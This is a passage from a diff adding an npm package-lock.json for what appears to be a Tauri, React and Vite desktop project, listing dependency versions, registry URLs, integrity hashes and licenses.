"sha512-EEM2gyhBF5MFnI6vMKdX1LAosE627RGBzIoGMdLloPZkXrUN0Ckqgr2Qi8+J3zip/8NVVro3/FjB+tjhZUgUHA==", + "cpu": [ + "ia32" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "win32" + ] + }, + "node_modules/@rollup/rollup-win32-x64-msvc": { + "version": "4.60.3", + "resolved": "https://registry.npmjs.org/@rollup/rollup-win32-x64-msvc/-/rollup-win32-x64-msvc-4.60.3.tgz", + "integrity": "sha512-hPt/bgL5cE+Qp+/TPHBqptcAgPzgj46mPcg/16zNUmbQk0j+mOEQV/+Lqu8QRtDV3Ek95Q6FeFITpuhl6OTsAA==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "win32" + ] + }, + "node_modules/@tauri-apps/api": { + "version": "2.11.0", + "resolved": "https://registry.npmjs.org/@tauri-apps/api/-/api-2.11.0.tgz", + "integrity": "sha512-7CinYODhky9lmO23xHnUFv0Xt43fbtWMyxZcLcRBlFkcgXKuEirBvHpmtJ89YMhyeGcq20Wuc47Fa4XjyniywA==", + "license": "Apache-2.0 OR MIT", + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/tauri" + } + }, + "node_modules/@tauri-apps/cli": { + "version": "2.11.1", + "resolved": "https://registry.npmjs.org/@tauri-apps/cli/-/cli-2.11.1.tgz", + "integrity": "sha512-rpEbaJ/HzNb6fwsquwoAbq29/Vt4gADhS423A8fdkwL4edJ0wZmoB8ar7O6JPDL834MUKOCm/rrJ7c9oAaEaYQ==", + "dev": true, + "license": "Apache-2.0 OR MIT", + "bin": { + "tauri": "tauri.js" + }, + "engines": { + "node": ">= 10" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/tauri" + }, + "optionalDependencies": { + "@tauri-apps/cli-darwin-arm64": "2.11.1", + "@tauri-apps/cli-darwin-x64": "2.11.1", + "@tauri-apps/cli-linux-arm-gnueabihf": "2.11.1", + "@tauri-apps/cli-linux-arm64-gnu": "2.11.1", + "@tauri-apps/cli-linux-arm64-musl": "2.11.1", + "@tauri-apps/cli-linux-riscv64-gnu": "2.11.1", + "@tauri-apps/cli-linux-x64-gnu": "2.11.1", + "@tauri-apps/cli-linux-x64-musl": "2.11.1", + "@tauri-apps/cli-win32-arm64-msvc": "2.11.1", + "@tauri-apps/cli-win32-ia32-msvc": "2.11.1", + "@tauri-apps/cli-win32-x64-msvc": "2.11.1" + } + }, + "node_modules/@tauri-apps/cli-darwin-arm64": { + "version": "2.11.1", + "resolved": "https://registry.npmjs.org/@tauri-apps/cli-darwin-arm64/-/cli-darwin-arm64-2.11.1.tgz", + "integrity": "sha512-6eEKMBXsQPCuM1EmvrjT2+aBuxWQuFdKdW8pzNuNQtpq45nEEpBlD5gr8pUeAyOU1DQKlkFaEc/MPBxb/Pfjtg==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "Apache-2.0 OR MIT", + "optional": true, + "os": [ + "darwin" + ], + "engines": { + "node": ">= 10" + } + }, + "node_modules/@tauri-apps/cli-darwin-x64": { + "version": "2.11.1", + "resolved": "https://registry.npmjs.org/@tauri-apps/cli-darwin-x64/-/cli-darwin-x64-2.11.1.tgz", + "integrity": "sha512-LQUO7exfRWjWALNhetph5guWpMeHphRpokOLk0OIbTTExaNwJNFu3I4vb+CCM/4G/QGoZe/5XikZOJdNEFP1ig==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "Apache-2.0 OR MIT", + "optional": true, + "os": [ + "darwin" + ], + "engines": { + "node": ">= 10" + } + }, + "node_modules/@tauri-apps/cli-linux-arm-gnueabihf": { + "version": "2.11.1", + "resolved": "https://registry.npmjs.org/@tauri-apps/cli-linux-arm-gnueabihf/-/cli-linux-arm-gnueabihf-2.11.1.tgz", + "integrity": "sha512-5i/awiBCRRhOUG8yjn0fMHXIWD5Ez8eEk5LtvOxyQrKuJkRaZDvnbIjZbE183blAwkoA4xN3aO/prJiqscl02Q==", + "cpu": [ + "arm" + ], + "dev": true, + "license": "Apache-2.0 OR MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">= 10" + } + }, + "node_modules/@tauri-apps/cli-linux-arm64-gnu": { + "version": "2.11.1", + "resolved": "https://registry.npmjs.org/@tauri-apps/cli-linux-arm64-gnu/-/cli-linux-arm64-gnu-2.11.1.tgz", + "integrity": "sha512-9LrwDw3S9Fygtw/Q6WDhOP+3svJRGAsejeE+GKrc0eO1ThMVhwi2LL6hw4dlKw93IfS7VY1G19sWGxJ/NcU4nA==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "Apache-2.0 OR MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">= 10" + } + }, + "node_modules/@tauri-apps/cli-linux-arm64-musl": { + "version": "2.11.1", + "resolved": "https://registry.npmjs.org/@tauri-apps/cli-linux-arm64-musl/-/cli-linux-arm64-musl-2.11.1.tgz", + "integrity": "sha512-mNA5dbbqPqDUdTIwdUYYuhO2GvIe9UnB2r0VU2njxBOS3Opbx4gKNC5yP0Iu4rYmEmqdlwry9VzGZQ3wq9dyFg==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "Apache-2.0 OR MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">= 10" + } + }, + "node_modules/@tauri-apps/cli-linux-riscv64-gnu": { + "version": "2.11.1", + "resolved": "https://registry.npmjs.org/@tauri-apps/cli-linux-riscv64-gnu/-/cli-linux-riscv64-gnu-2.11.1.tgz", + "integrity": "sha512-fZj3Gwq+6fUs305T5WQiD5iSGJw+j/4w/HGmk4sHDAcy+rp9zU5eaxB7nOyz5/I/nkNAuKPqfp6uIbiUBXkBCw==", + "cpu": [ + "riscv64" + ], + "dev": true, + "license": "Apache-2.0 OR MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">= 10" + } + }, + "node_modules/@tauri-apps/cli-linux-x64-gnu": { + "version": "2.11.1", + "resolved": "https://registry.npmjs.org/@tauri-apps/cli-linux-x64-gnu/-/cli-linux-x64-gnu-2.11.1.tgz", + "integrity": "sha512-XFxGxOvHM7jjeD6ozCKdGfhzJ7lERYDGZl1/Kb4fsvchaJsfLJ981TlyTG8Qy/gFq+f5GitH3bfrX9JAkjPEyw==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "Apache-2.0 OR MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">= 10" + } + }, + "node_modules/@tauri-apps/cli-linux-x64-musl": { + "version": "2.11.1", + "resolved": "https://registry.npmjs.org/@tauri-apps/cli-linux-x64-musl/-/cli-linux-x64-musl-2.11.1.tgz", + "integrity": "sha512-d5C2/Zm+68v7R9wTuTCjRQEVrWjcdMkJBZ1+rXse+QdMMlTB9+u9PDNDLw9PQflWxYLaYZ7tjxxL9Nb9II6PbA==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "Apache-2.0 OR MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">= 10" + } + }, + "node_modules/@tauri-apps/cli-win32-arm64-msvc": { + "version": "2.11.1", + "resolved": "https://registry.npmjs.org/@tauri-apps/cli-win32-arm64-msvc/-/cli-win32-arm64-msvc-2.11.1.tgz", + "integrity": "sha512-YdeVWFAR1pTXzUU6NLstPq4G6OLxuDrXCXEBdmBH+5EZIDXUx0D2kJlz3+YjpazkKvAzYpgziTsyRagls0OfRQ==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "Apache-2.0 OR MIT", + "optional": true, + "os": [ + "win32" + ], + "engines": { + "node": ">= 10" + } + }, + "node_modules/@tauri-apps/cli-win32-ia32-msvc": { + "version": "2.11.1", + "resolved": "https://registry.npmjs.org/@tauri-apps/cli-win32-ia32-msvc/-/cli-win32-ia32-msvc-2.11.1.tgz", + "integrity": "sha512-VBGkuH0eB9K9LLSMv361Gzr5Ou72sCS4+ztpmkWEQ+wd/amhcYOsf3X6qn1RJZDzIhiOYHJEOysZUC3baD01rA==", + "cpu": [ + "ia32" + ], + "dev": true, + "license": "Apache-2.0 OR MIT", + "optional": true, + "os": [ + "win32" + ], + "engines": { + "node": ">= 10" + } + }, + "node_modules/@tauri-apps/cli-win32-x64-msvc": { + "version": "2.11.1", + "resolved": "https://registry.npmjs.org/@tauri-apps/cli-win32-x64-msvc/-/cli-win32-x64-msvc-2.11.1.tgz", + "integrity": "sha512-b3ORhIAKgp9ZYY+zBt7b7r0kLU2kjvyGF0+MS2SBym3emsweGPybEqocJcmtMuxyBhkOKHP4CiuEJEDuAlTx6A==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "Apache-2.0 OR MIT", + "os": [ + "win32" + ], + "engines": { + "node": ">= 10" + } + }, + "node_modules/@types/babel__core": { + "version": "7.20.5", + "resolved": "https://registry.npmjs.org/@types/babel__core/-/babel__core-7.20.5.tgz", + "integrity": "sha512-qoQprZvz5wQFJwMDqeseRXWv3rqMvhgpbXFfVyWhbx9X47POIA6i/+dXefEmZKoAgOaTdaIgNSMqMIU61yRyzA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@babel/parser": "^7.20.7", + "@babel/types": "^7.20.7", + "@types/babel__generator": "*", + "@types/babel__template": "*", + "@types/babel__traverse": "*" + } + }, + "node_modules/@types/babel__generator": { + "version": "7.27.0", + "resolved": "https://registry.npmjs.org/@types/babel__generator/-/babel__generator-7.27.0.tgz", + "integrity": "sha512-ufFd2Xi92OAVPYsy+P4n7/U7e68fex0+Ee8gSG9KX7eo084CWiQ4sdxktvdl0bOPupXtVJPY19zk6EwWqUQ8lg==", + "dev": true, + "license": "MIT", + "dependencies": { + "@babel/types": "^7.0.0" + } + }, + "node_modules/@types/babel__template": { + "version": "7.4.4", + "resolved": "https://registry.npmjs.org/@types/babel__template/-/babel__template-7.4.4.tgz", + "integrity": "sha512-h/NUaSyG5EyxBIp8YRxo4RMe2/qQgvyowRwVMzhYhBCONbW8PUsg4lkFMrhgZhUe5z3L3MiLDuvyJ/CaPa2A8A==", + "dev": true, + "license": "MIT", + "dependencies": { + "@babel/parser": "^7.1.0", + "@babel/types": "^7.0.0" + } + }, + "node_modules/@types/babel__traverse": { + "version": "7.28.0", + "resolved": "https://registry.npmjs.org/@types/babel__traverse/-/babel__traverse-7.28.0.tgz", + "integrity": "sha512-8PvcXf70gTDZBgt9ptxJ8elBeBjcLOAcOtoO/mPJjtji1+CdGbHgm77om1GrsPxsiE+uXIpNSK64UYaIwQXd4Q==", + "dev": true, + "license": "MIT", + "dependencies": { + "@babel/types": "^7.28.2" + } + }, + "node_modules/@types/estree": { + "version": "1.0.8", + "resolved": "https://registry.npmjs.org/@types/estree/-/estree-1.0.8.tgz", + "integrity": "sha512-dWHzHa2WqEXI/O1E9OjrocMTKJl2mSrEolh1Iomrv6U+JuNwaHXsXx9bLu5gG7BUWFIN0skIQJQ/L1rIex4X6w==", + "dev": true, + "license": "MIT" + }, + "node_modules/@types/prop-types": { + "version": "15.7.15", + "resolved": "https://registry.npmjs.org/@types/prop-types/-/prop-types-15.7.15.tgz", + "integrity": "sha512-F6bEyamV9jKGAFBEmlQnesRPGOQqS2+Uwi0Em15xenOxHaf2hv6L8YCVn3rPdPJOiJfPiCnLIRyvwVaqMY3MIw==", + "devOptional": true, + "license": "MIT" + }, + "node_modules/@types/react": { + "version": "18.3.28", + "resolved": "https://registry.npmjs.org/@types/react/-/react-18.3.28.tgz", + "integrity": "sha512-z9VXpC7MWrhfWipitjNdgCauoMLRdIILQsAEV+ZesIzBq/oUlxk0m3ApZuMFCXdnS4U7KrI+l3WRUEGQ8K1QKw==", + "devOptional": true, + "license": "MIT", + "dependencies": { + "@types/prop-types": "*", + "csstype": "^3.2.2" + } + }, + "node_modules/@types/react-dom": { + "version": "18.3.7", + "resolved": "https://registry.npmjs.org/@types/react-dom/-/react-dom-18.3.7.tgz", + "integrity": "sha512-MEe3UeoENYVFXzoXEWsvcpg6ZvlrFNlOQ7EOsvhI3CfAXwzPfO8Qwuxd40nepsYKqyyVQnTdEfv68q91yLcKrQ==", + "dev": true, + "license": "MIT", + "peerDependencies": { + "@types/react": "^18.0.0" + } + }, + "node_modules/@vitejs/plugin-react": { + "version": "4.7.0", + "resolved": "https://registry.npmjs.org/@vitejs/plugin-react/-/plugin-react-4.7.0.tgz", + "integrity": "sha512-gUu9hwfWvvEDBBmgtAowQCojwZmJ5mcLn3aufeCsitijs3+f2NsrPtlAWIR6OPiqljl96GVCUbLe0HyqIpVaoA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@babel/core": "^7.28.0", + "@babel/plugin-transform-react-jsx-self": "^7.27.1", + "@babel/plugin-transform-react-jsx-source": "^7.27.1", + "@rolldown/pluginutils": "1.0.0-beta.27", + "@types/babel__core": "^7.20.5", + "react-refresh": "^0.17.0" + }, + "engines": { + "node": "^14.18.0 || >=16.0.0" + }, + "peerDependencies": { + "vite": "^4.2.0 || ^5.0.0 || ^6.0.0 || ^7.0.0" + } + }, + "node_modules/@xterm/addon-fit": { + "version": "0.9.0", + "resolved": "https://registry.npmjs.org/@xterm/addon-fit/-/addon-fit-0.9.0.tgz", + "integrity": "sha512-hDlPPbTVPYyvwXu/asW8HbJkI/2RMi0cMaJnBZYVeJB0SWP2NeESMCNr+I7CvBlyI0sAxpxOg8Wk4OMkxBz9WA==", + "license": "MIT", + "peerDependencies": { + "@xterm/xterm": "^5.0.0" + } + }, + "node_modules/@xterm/xterm": { + "version": "5.5.0", + "resolved": "https://registry.npmjs.org/@xterm/xterm/-/xterm-5.5.0.tgz", + "integrity": "sha512-hqJHYaQb5OptNunnyAnkHyM8aCjZ1MEIDTQu1iIbbTD/xops91NB5yq1ZK/dC2JDbVWtF23zUtl9JE2NqwT87A==", + "license": "MIT" + }, + "node_modules/asynckit": { + "version": "0.4.0", + "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", + "integrity": "sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==", + "license": "MIT" + }, + "node_modules/axios": { + "version": "1.16.0", + "resolved": "https://registry.npmjs.org/axios/-/axios-1.16.0.tgz", + "integrity": "sha512-6hp5CwvTPlN2A31g5dxnwAX0orzM7pmCRDLnZSX772mv8WDqICwFjowHuPs04Mc8deIld1+ejhtaMn5vp6b+1w==", + "license": "MIT", + "dependencies": { + "follow-redirects": "^1.16.0", + "form-data": "^4.0.5", + "proxy-from-env": "^2.1.0" + } + }, + "node_modules/baseline-browser-mapping": { + "version": "2.10.29", + "resolved": "https://registry.npmjs.org/baseline-browser-mapping/-/baseline-browser-mapping-2.10.29.tgz", + "integrity": "sha512-Asa2krT+XTPZINCS+2QcyS8WTkObE77RwkydwF7h6DmnKqbvlalz93m/dnphUyCa6SWSP51VgtEUf2FN+gelFQ==", + "dev": true, + "license": "Apache-2.0", + "bin": { + "baseline-browser-mapping": "dist/cli.cjs" + }, + "engines": { + "node": ">=6.0.0" + } + }, + "node_modules/browserslist": { + "version": "4.28.2", + "resolved": "https://registry.npmjs.org/browserslist/-/browserslist-4.28.2.tgz", + "integrity": "sha512-48xSriZYYg+8qXna9kwqjIVzuQxi+KYWp2+5nCYnYKPTr0LvD89Jqk2Or5ogxz0NUMfIjhh2lIUX/LyX9B4oIg==", + "dev": true, + "funding": [ + { + "type": "opencollective", + "url": "https://opencollective.com/browserslist" + }, + { + "type": "tidelift", + "url": "https://tidelift.com/funding/github/npm/browserslist" + }, + { + "type": "github", + "url": "https://github.com/sponsors/ai" + } + ], + "license": "MIT", + "dependencies": { + "baseline-browser-mapping": "^2.10.12", + "caniuse-lite": "^1.0.30001782", + "electron-to-chromium": "^1.5.328", + "node-releases": "^2.0.36", + "update-browserslist-db": "^1.2.3" + }, + "bin": { + "browserslist": "cli.js" + }, + "engines": { + "node": "^6 || ^7 || ^8 || ^9 || ^10 || ^11 || ^12 || >=13.7" + } + }, + "node_modules/call-bind-apply-helpers": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/call-bind-apply-helpers/-/call-bind-apply-helpers-1.0.2.tgz", + "integrity": "sha512-Sp1ablJ0ivDkSzjcaJdxEunN5/XvksFJ2sMBFfq6x0ryhQV/2b/KwFe21cMpmHtPOSij8K99/wSfoEuTObmuMQ==", + "license": "MIT", + "dependencies": { + "es-errors": "^1.3.0", + "function-bind": "^1.1.2" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/caniuse-lite": { + "version": "1.0.30001792", + "resolved": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001792.tgz", + "integrity": "sha512-hVLMUZFgR4JJ6ACt1uEESvQN1/dBVqPAKY0hgrV70eN3391K6juAfTjKZLKvOMsx8PxA7gsY1/tLMMTcfFLLpw==", + "dev": true, + "funding": [ + { + "type": "opencollective", + "url": "https://opencollective.com/browserslist" + }, + { + "type": "tidelift", + "url": "https://tidelift.com/funding/github/npm/caniuse-lite" + }, + { + "type": "github", + "url": "https://github.com/sponsors/ai" + } + ], + "license": "CC-BY-4.0" + }, + "node_modules/combined-stream": { + "version": "1.0.8", + "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", + "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", + "license": "MIT", + "dependencies": { + "delayed-stream": "~1.0.0" + }, + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/convert-source-map": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", + "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", + "dev": true, + "license": "MIT" + }, + "node_modules/csstype": { + "version": "3.2.3", + "resolved": "https://registry.npmjs.org/csstype/-/csstype-3.2.3.tgz", + "integrity": "sha512-z1HGKcYy2xA8AGQfwrn0PAy+PB7X/GSj3UVJW9qKyn43xWa+gl5nXmU4qqLMRzWVLFC8KusUX8T/0kCiOYpAIQ==", + "devOptional": true, + "license": "MIT" + }, + "node_modules/debug": { + "version": "4.4.3", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.4.3.tgz", + "integrity": "sha512-RGwwWnwQvkVfavKVt22FGLw+xYSdzARwm0ru6DhTVA3umU5hZc28V3kO4stgYryrTlLpuvgI9GiijltAjNbcqA==", + "dev": true, + "license": "MIT", + "dependencies": { + "ms": "^2.1.3" + }, + "engines": { + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } + } + }, + "node_modules/delayed-stream": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", + "integrity": "sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==", + "license": "MIT", + "engines": { + "node": ">=0.4.0" + } + }, + "node_modules/dunder-proto": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/dunder-proto/-/dunder-proto-1.0.1.tgz", + "integrity": "sha512-KIN/nDJBQRcXw0MLVhZE9iQHmG68qAVIBg9CqmUYjmQIhgij9U5MFvrqkUL5FbtyyzZuOeOt0zdeRe4UY7ct+A==", + "license": "MIT", + "dependencies": { + "call-bind-apply-helpers": "^1.0.1", + "es-errors": "^1.3.0", + "gopd": "^1.2.0" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/electron-to-chromium": { + "version": "1.5.354", + "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.5.354.tgz", + "integrity": "sha512-JaBHwWcfIdmSAfWM5l3uwjGd431j8YEMikZ+K/2nXVuBqJKyZ0f+2h4n4JY5AyNiZmnY9qQr2RU3v9DxDmHMNg==", + "dev": true, + "license": "ISC" + }, + "node_modules/es-define-property": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/es-define-property/-/es-define-property-1.0.1.tgz", + "integrity": "sha512-e3nRfgfUZ4rNGL232gUgX06QNyyez04KdjFrF+LTRoOXmrOgFKDg4BCdsjW8EnT69eqdYGmRpJwiPVYNrCaW3g==", + "license": "MIT", + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/es-errors": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/es-errors/-/es-errors-1.3.0.tgz", + "integrity": "sha512-Zf5H2Kxt2xjTvbJvP2ZWLEICxA6j+hAmMzIlypy4xcBg1vKVnx89Wy0GbS+kf5cwCVFFzdCFh2XSCFNULS6csw==", + "license": "MIT", + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/es-object-atoms": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/es-object-atoms/-/es-object-atoms-1.1.1.tgz", + "integrity": "sha512-FGgH2h8zKNim9ljj7dankFPcICIK9Cp5bm+c2gQSYePhpaG5+esrLODihIorn+Pe6FGJzWhXQotPv73jTaldXA==", + "license": "MIT", + "dependencies": { + "es-errors": "^1.3.0" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/es-set-tostringtag": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/es-set-tostringtag/-/es-set-tostringtag-2.1.0.tgz", + "integrity": "sha512-j6vWzfrGVfyXxge+O0x5sh6cvxAog0a/4Rdd2K36zCMV5eJ+/+tOAngRO8cODMNWbVRdVlmGZQL2YS3yR8bIUA==", + "license": "MIT", + "dependencies": { + "es-errors": "^1.3.0", + "get-intrinsic": "^1.2.6", + "has-tostringtag": "^1.0.2", + "hasown": "^2.0.2" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/esbuild": { + "version": "0.21.5", + "resolved": "https://registry.npmjs.org/esbuild/-/esbuild-0.21.5.tgz", + "integrity": "sha512-mg3OPMV4hXywwpoDxu3Qda5xCKQi+vCTZq8S9J/EpkhB2HzKXq4SNFZE3+NK93JYxc8VMSep+lOUSC/RVKaBqw==", + "dev": true, + "hasInstallScript": true, + "license": "MIT", + "bin": { + "esbuild": "bin/esbuild" + }, + "engines": { + "node": ">=12" + }, + "optionalDependencies": { + "@esbuild/aix-ppc64": "0.21.5", + "@esbuild/android-arm": "0.21.5", + "@esbuild/android-arm64": "0.21.5", + "@esbuild/android-x64": "0.21.5", + "@esbuild/darwin-arm64": "0.21.5", + "@esbuild/darwin-x64": "0.21.5", + "@esbuild/freebsd-arm64": "0.21.5", + "@esbuild/freebsd-x64": "0.21.5", + "@esbuild/linux-arm": "0.21.5", + "@esbuild/linux-arm64": "0.21.5", + "@esbuild/linux-ia32": "0.21.5", + "@esbuild/linux-loong64": "0.21.5", + "@esbuild/linux-mips64el": "0.21.5", + "@esbuild/linux-ppc64": "0.21.5", + "@esbuild/linux-riscv64": "0.21.5", + "@esbuild/linux-s390x": "0.21.5", + "@esbuild/linux-x64": "0.21.5", + "@esbuild/netbsd-x64": "0.21.5", + "@esbuild/openbsd-x64": "0.21.5", + "@esbuild/sunos-x64": "0.21.5", + "@esbuild/win32-arm64": "0.21.5", + "@esbuild/win32-ia32": "0.21.5", + "@esbuild/win32-x64": "0.21.5" + } + }, + "node_modules/esbuild/node_modules/@esbuild/win32-x64": { + "version": "0.21.5", + "resolved": "https://registry.npmjs.org/@esbuild/win32-x64/-/win32-x64-0.21.5.tgz", + "integrity": "sha512-tQd/1efJuzPC6rCFwEvLtci/xNFcTZknmXs98FYDfGE4wP9ClFV98nyKrzJKVPMhdDnjzLhdUyMX4PsQAPjwIw==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "win32" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/escalade": { + "version": "3.2.0", + "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.2.0.tgz", + "integrity": "sha512-WUj2qlxaQtO4g6Pq5c29GTcWGDyd8itL8zTlipgECz3JesAiiOKotd8JU6otB3PACgG6xkJUyVhboMS+bje/jA==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=6" + } + }, + "node_modules/follow-redirects": { + "version": "1.16.0", + "resolved": "https://registry.npmjs.org/follow-redirects/-/follow-redirects-1.16.0.tgz", + "integrity": "sha512-y5rN/uOsadFT/JfYwhxRS5R7Qce+g3zG97+JrtFZlC9klX/W5hD7iiLzScI4nZqUS7DNUdhPgw4xI8W2LuXlUw==", + "funding": [ + { + "type": "individual", + "url": "https://github.com/sponsors/RubenVerborgh" + } + ], + "license": "MIT", + "engines": { + "node": ">=4.0" + }, + "peerDependenciesMeta": { + "debug": { + "optional": true + } + } + }, + "node_modules/form-data": { + "version": "4.0.5", + "resolved": "https://registry.npmjs.org/form-data/-/form-data-4.0.5.tgz", + "integrity": "sha512-8RipRLol37bNs2bhoV67fiTEvdTrbMUYcFTiy3+wuuOnUog2QBHCZWXDRijWQfAkhBj2Uf5UnVaiWwA5vdd82w==", + "license": "MIT", + "dependencies": { + "asynckit": "^0.4.0", + "combined-stream": "^1.0.8", + "es-set-tostringtag": "^2.1.0", + "hasown": "^2.0.2", + "mime-types": "^2.1.12" + }, + "engines": { + "node": ">= 6" + } + }, + "node_modules/fsevents": { + "version": "2.3.3", + "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.3.tgz", + "integrity": "sha512-5xoDfX+fL7faATnagmWPpbFtwh/R77WmMMqqHGS65C3vvB0YHrgF+B1YmZ3441tMj5n63k0212XNoJwzlhffQw==", + "dev": true, + "hasInstallScript": true, + "license": "MIT", + "optional": true, + "os": [ + "darwin" + ], + "engines": { + "node": "^8.16.0 || ^10.6.0 || >=11.0.0" + } + }, + "node_modules/function-bind": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", + "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==", + "license": "MIT", + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/gensync": { + "version": "1.0.0-beta.2", + "resolved": "https://registry.npmjs.org/gensync/-/gensync-1.0.0-beta.2.tgz", + "integrity": "sha512-3hN7NaskYvMDLQY55gnW3NQ+mesEAepTqlg+VEbj7zzqEMBVNhzcGYYeqFo/TlYz6eQiFcp1HcsCZO+nGgS8zg==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/get-intrinsic": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/get-intrinsic/-/get-intrinsic-1.3.0.tgz", + "integrity": "sha512-9fSjSaos/fRIVIp+xSJlE6lfwhES7LNtKaCBIamHsjr2na1BiABJPo0mOjjz8GJDURarmCPGqaiVg5mfjb98CQ==", + "license": "MIT", + "dependencies": { + "call-bind-apply-helpers": "^1.0.2", + "es-define-property": "^1.0.1", + "es-errors": "^1.3.0", + "es-object-atoms": "^1.1.1", + "function-bind": "^1.1.2", + "get-proto": "^1.0.1", + "gopd": "^1.2.0", + "has-symbols": "^1.1.0", + "hasown": "^2.0.2", + "math-intrinsics": "^1.1.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/get-proto": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/get-proto/-/get-proto-1.0.1.tgz", + "integrity": "sha512-sTSfBjoXBp89JvIKIefqw7U2CCebsc74kiY6awiGogKtoSGbgjYE/G/+l9sF3MWFPNc9IcoOC4ODfKHfxFmp0g==", + "license": "MIT", + "dependencies": { + "dunder-proto": "^1.0.1", + "es-object-atoms": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/gopd": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/gopd/-/gopd-1.2.0.tgz", + "integrity": "sha512-ZUKRh6/kUFoAiTAtTYPZJ3hw9wNxx+BIBOijnlG9PnrJsCcSjs1wyyD6vJpaYtgnzDrKYRSqf3OO6Rfa93xsRg==", + "license": "MIT", + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/has-symbols": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/has-symbols/-/has-symbols-1.1.0.tgz", + "integrity": "sha512-1cDNdwJ2Jaohmb3sg4OmKaMBwuC48sYni5HUw2DvsC8LjGTLK9h+eb1X6RyuOHe4hT0ULCW68iomhjUoKUqlPQ==", + "license": "MIT", + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/has-tostringtag": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/has-tostringtag/-/has-tostringtag-1.0.2.tgz", + "integrity": "sha512-NqADB8VjPFLM2V0VvHUewwwsw0ZWBaIdgo+ieHtK3hasLz4qeCRjYcqfB6AQrBggRKppKF8L52/VqdVsO47Dlw==", + "license": "MIT", + "dependencies": { + "has-symbols": "^1.0.3" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/hasown": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.3.tgz", + "integrity": "sha512-ej4AhfhfL2Q2zpMmLo7U1Uv9+PyhIZpgQLGT1F9miIGmiCJIoCgSmczFdrc97mWT4kVY72KA+WnnhJ5pghSvSg==", + "license": "MIT", + "dependencies": { + "function-bind": "^1.1.2" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/js-tokens": { + 